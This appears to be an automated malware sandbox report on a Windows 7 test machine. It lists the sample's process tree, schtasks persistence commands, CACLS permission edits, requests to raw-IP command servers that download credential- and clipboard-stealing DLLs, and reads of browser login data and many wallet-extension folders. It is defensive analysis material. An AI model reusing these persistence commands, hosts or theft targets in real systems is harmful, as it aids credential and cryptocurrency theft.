Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Nov. 4, 2023, 10:30 a.m. | Nov. 4, 2023, 10:39 a.m. |
Process | PID | Command line |
---|---|---|
AppLaunch.exe | 2372 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
aVUSfm8IjQeFpIY.exe | 2996 | "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe" |
cmd.exe | 792 | /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe" /tn "\WindowsAppPool\aVUSfm8IjQeFpIY" |
schtasks.exe | 2848 | schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe" /tn "\WindowsAppPool\aVUSfm8IjQeFpIY" |
3Tp00Kt.exe | 2600 | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3Tp00Kt.exe |
AppLaunch.exe | 2756 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
schtasks.exe | 3036 | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F |
cmd.exe | 2104 | "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit |
cmd.exe | 2256 | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cacls.exe | 2520 | CACLS "explothe.exe" /P "test22:N" |
cacls.exe | 2692 | CACLS "explothe.exe" /P "test22:R" /E |
cmd.exe | 2752 | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cacls.exe | 2864 | CACLS "..\fefffe8cea" /P "test22:N" |
cacls.exe | 2968 | CACLS "..\fefffe8cea" /P "test22:R" /E |
rundll32.exe | 1532 | "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main |
6kH8UT7.exe | 2948 | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6kH8UT7.exe |
cmd.exe | 2400 | cmd /c ""C:\Users\test22\AppData\Local\Temp\is64.bat" " |
Suricata Alerts
Suricata TLS
No Suricata TLS
Key | Value |
---|---|
pdb_path | wextract.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
resource name | AVI |
suspicious_request | POST http://193.233.255.73/loghub/master (POST method with no referer header, Connection to IP address) |
suspicious_request | POST http://77.91.124.1/theme/index.php (POST method with no referer header, POST method with no useragent header, Connection to IP address) |
suspicious_request | GET http://77.91.124.1/theme/Plugins/cred64.dll (GET method with no useragent header, Connection to IP address) |
suspicious_request | GET http://77.91.124.1/theme/Plugins/clip64.dll (GET method with no useragent header, Connection to IP address) |
request | POST http://193.233.255.73/loghub/master |
request | POST http://77.91.124.1/theme/index.php |
request | GET http://77.91.124.1/theme/Plugins/cred64.dll |
request | GET http://77.91.124.1/theme/Plugins/clip64.dll |
description | explothe.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielpathgobddffflal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnpath |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\gjagmgpathdbbciopjhllkdnddhcglnemk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehpathddafch |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghpathoadd |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhgnbkkipaallpehbohjmkbjofjdmepath |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi |
file | C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2OV7021.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\VZ6Dn81.exe |
file | C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4yv539Ea.exe |
file | C:\Users\test22\AppData\Local\Temp\7Nrg4I9t91Xs3Rru.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\zr6og76.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6kH8UT7.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\is64.bat |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\po5KW36.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7Qv4re94.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5Jd8Hi6.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\OX3YJ37.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3Tp00Kt.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1aQ07Ww6.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\KJ6mf22.exe |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F |
cmdline | /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe" /tn "\WindowsAppPool\aVUSfm8IjQeFpIY" |
cmdline | schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe" /tn "\WindowsAppPool\aVUSfm8IjQeFpIY" |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F |
file | C:\Users\test22\AppData\Local\Temp\aVUSfm8IjQeFpIY.exe |
file | C:\Users\test22\AppData\Local\Temp\is64.bat |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |